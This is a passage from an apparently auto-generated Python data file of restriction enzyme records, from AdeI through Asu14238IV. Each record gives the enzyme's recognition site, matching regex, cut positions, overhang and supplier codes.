'charac': (6, -6, None, None, 'CACNNNGTG'),
'compsite': '(?=(?P<AdeI>CAC...GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNGTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AdeI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAANCAG'),
'compsite': '(?=(?P<Adh6U21I>GAA.CAG))|(?=(?P<Adh6U21I_as>CTG.TTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Adh6U21I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTAC'),
'compsite': '(?=(?P<AfaI>GTAC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTAC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['AfaI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGCGCT'),
'compsite': '(?=(?P<AfeI>AGCGCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['AfeI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<AfiI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['AfiI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTTAAG'),
'compsite': '(?=(?P<AflII>CTTAAG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TTAA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTAAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'N'),
}
rest_dict['AflII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACRYGT'),
'compsite': '(?=(?P<AflIII>AC[AG][CT]GT))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CRYG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACRYGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'N', 'S'),
}
rest_dict['AflIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<AgeI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N', 'R'),
}
rest_dict['AgeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTSAA'),
'compsite': '(?=(?P<AgsI>TT[CG]AA))',
'dna': None,
'freq': 512.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTSAA',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AgsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TTTAAA'),
'compsite': '(?=(?P<AhaIII>TTTAAA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTTAAA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AhaIII'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<AhdI>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AhdI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACTAGT'),
'compsite': '(?=(?P<AhlI>ACTAGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTAGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AhlI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCYYGAC'),
'compsite': '(?=(?P<AhyRBAHI>GC[CT][CT]GAC))|(?=(?P<AhyRBAHI_as>GTC[AG][AG]GC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCYYGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AhyRBAHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'YAAMGAG'),
'compsite': '(?=(?P<AhyYL17I>[CT]AA[AC]GAG))|(?=(?P<AhyYL17I_as>CTC[GT]TT[AG]))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'YAAMGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AhyYL17I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTC'),
'compsite': '(?=(?P<AjiI>CACGTC))|(?=(?P<AjiI_as>GACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AjiI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CCWGG'),
'compsite': '(?=(?P<AjnI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AjnI'] = _temp()
def _temp():
return {
'charac': (-7, -26, 25, 6, 'GAANNNNNNNTTGG'),
'compsite': '(?=(?P<AjuI>GAA.......TTGG))|(?=(?P<AjuI_as>CCAA.......TTC))',
'dna': None,
'freq': 16384.0,
'fst3': -26,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 6,
'scd5': 25,
'site': 'GAANNNNNNNTTGG',
'size': 14,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AjuI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CACNNNNGTG'),
'compsite': '(?=(?P<AleI>CAC....GTG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACNNNNGTG',
'size': 10,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AleI'] = _temp()
def _temp():
return {
'charac': (-10, -24, 24, 10, 'GCANNNNNNTGC'),
'compsite': '(?=(?P<AlfI>GCA......TGC))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': 10,
'scd5': 24,
'site': 'GCANNNNNNTGC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AlfI'] = _temp()
def _temp():
return {
'charac': (-7, -25, 25, 7, 'GAACNNNNNNTCC'),
'compsite': '(?=(?P<AloI>GAAC......TCC))|(?=(?P<AloI_as>GGA......GTTC))',
'dna': None,
'freq': 16384.0,
'fst3': -25,
'fst5': -7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 7,
'scd5': 25,
'site': 'GAACNNNNNNTCC',
'size': 13,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['AloI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AGCT'),
'compsite': '(?=(?P<AluBI>AGCT))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCT',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AluBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AGCT'),
'compsite': '(?=(?P<AluI>AGCT))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCT',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'),
}
rest_dict['AluI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<Alw21I>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Alw21I'] = _temp()
def _temp():
return {
'charac': (6, 5, None, None, 'GTCTC'),
'compsite': '(?=(?P<Alw26I>GTCTC))|(?=(?P<Alw26I_as>GAGAC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Alw26I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTGCAC'),
'compsite': '(?=(?P<Alw44I>GTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'J'),
}
rest_dict['Alw44I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAAYNNNNNRTG'),
'compsite': '(?=(?P<AlwFI>GAAA[CT].....[AG]TG))|(?=(?P<AlwFI_as>CA[CT].....[AG]TTTC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAAYNNNNNRTG',
'size': 13,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AlwFI'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GGATC'),
'compsite': '(?=(?P<AlwI>GGATC))|(?=(?P<AlwI_as>GATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AlwI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CAGNNNCTG'),
'compsite': '(?=(?P<AlwNI>CAG...CTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGNNNCTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AlwNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<Ama87I>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Ama87I'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'GCTCCA'),
'compsite': '(?=(?P<AmaCSI>GCTCCA))|(?=(?P<AmaCSI_as>TGGAGC))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AmaCSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GATCNAC'),
'compsite': '(?=(?P<Aod1I>GATC.AC))|(?=(?P<Aod1I_as>GT.GATC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATCNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Aod1I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<Aor13HI>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['Aor13HI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGCGCT'),
'compsite': '(?=(?P<Aor51HI>AGCGCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['Aor51HI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GGCC'),
'compsite': '(?=(?P<AoxI>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['AoxI'] = _temp()
def _temp():
return {
'charac': (8, -8, None, None, 'GCANNNNNTGC'),
'compsite': '(?=(?P<ApaBI>GCA.....TGC))',
'dna': None,
'freq': 4096.0,
'fst3': -8,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCANNNNNTGC',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ApaBI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GGGCCC'),
'compsite': '(?=(?P<ApaI>GGGCCC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['ApaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GTGCAC'),
'compsite': '(?=(?P<ApaLI>GTGCAC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('C', 'K', 'N'),
}
rest_dict['ApaLI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCWGC'),
'compsite': '(?=(?P<ApeKI>GC[AT]GC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'CWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCWGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['ApeKI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RAATTY'),
'compsite': '(?=(?P<ApoI>[AG]AATT[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RAATTY',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['ApoI'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'ATCGAC'),
'compsite': '(?=(?P<ApyPI>ATCGAC))|(?=(?P<ApyPI_as>GTCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['ApyPI'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'GCCGNAC'),
'compsite': '(?=(?P<AquII>GCCG.AC))|(?=(?P<AquII_as>GT.CGGC))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCGNAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AquII'] = _temp()
def _temp():
return {
'charac': (26, 18, None, None, 'GAGGAG'),
'compsite': '(?=(?P<AquIII>GAGGAG))|(?=(?P<AquIII_as>CTCCTC))',
'dna': None,
'freq': 4096.0,
'fst3': 18,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AquIII'] = _temp()
def _temp():
return {
'charac': (26, 17, None, None, 'GRGGAAG'),
'compsite': '(?=(?P<AquIV>G[AG]GGAAG))|(?=(?P<AquIV_as>CTTCC[CT]C))',
'dna': None,
'freq': 8192.0,
'fst3': 17,
'fst5': 26,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AquIV'] = _temp()
def _temp():
return {
'charac': (-8, -26, 24, 6, 'GACNNNNNNTTYG'),
'compsite': '(?=(?P<ArsI>GAC......TT[CT]G))|(?=(?P<ArsI_as>C[AG]AA......GTC))',
'dna': None,
'freq': 8192.0,
'fst3': -26,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 6,
'scd5': 24,
'site': 'GACNNNNNNTTYG',
'size': 13,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['ArsI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCGCGCC'),
'compsite': '(?=(?P<AscI>GGCGCGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCGCC',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['AscI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATTAAT'),
'compsite': '(?=(?P<AseI>ATTAAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATTAAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N'),
}
rest_dict['AseI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GATC'),
'compsite': '(?=(?P<Asi256I>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asi256I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCGGT'),
'compsite': '(?=(?P<AsiGI>ACCGGT))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCGGT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AsiGI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCGATCGC'),
'compsite': '(?=(?P<AsiSI>GCGATCGC))',
'dna': None,
'freq': 65536.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGATCGC',
'size': 8,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['AsiSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGRAGGC'),
'compsite': '(?=(?P<Asp103I>CG[AG]AGGC))|(?=(?P<Asp103I_as>GCCT[CT]CG))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGRAGGC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asp103I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCABCC'),
'compsite': '(?=(?P<Asp114pII>AGCA[CGT]CC))|(?=(?P<Asp114pII_as>GG[ACG]TGCT))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCABCC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Asp114pII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GAANNNNTTC'),
'compsite': '(?=(?P<Asp700I>GAA....TTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAANNNNTTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['Asp700I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGTACC'),
'compsite': '(?=(?P<Asp718I>GGTACC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GTAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTACC',
'size': 6,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['Asp718I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<AspA2I>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AspA2I'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'YSCNS'),
'compsite': '(?=(?P<AspBHI>[CT][CG]C.[CG]))|(?=(?P<AspBHI_as>[CG].G[CG][AG]))',
'dna': None,
'freq': 32.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YSCNS',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspBHI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GNGCAAC'),
'compsite': '(?=(?P<AspDUT2V>G.GCAAC))|(?=(?P<AspDUT2V_as>GTTGC.C))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GNGCAAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspDUT2V'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCCCAG'),
'compsite': '(?=(?P<AspJHL3II>CGCCCAG))|(?=(?P<AspJHL3II_as>CTGGGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCCCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspJHL3II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCGC'),
'compsite': '(?=(?P<AspLEI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AspLEI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AAGAACB'),
'compsite': '(?=(?P<AspNIH4III>AAGAAC[CGT]))|(?=(?P<AspNIH4III_as>[ACG]GTTCTT))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AAGAACB',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspNIH4III'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<AspS9I>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['AspS9I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTCTCA'),
'compsite': '(?=(?P<AspSLV7III>GTCTCA))|(?=(?P<AspSLV7III_as>TGAGAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTCTCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['AspSLV7III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGTRAC'),
'compsite': '(?=(?P<Asu14238IV>CGT[AG]AC))|(?=(?P<Asu14238IV_as>GT[CT]ACG))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
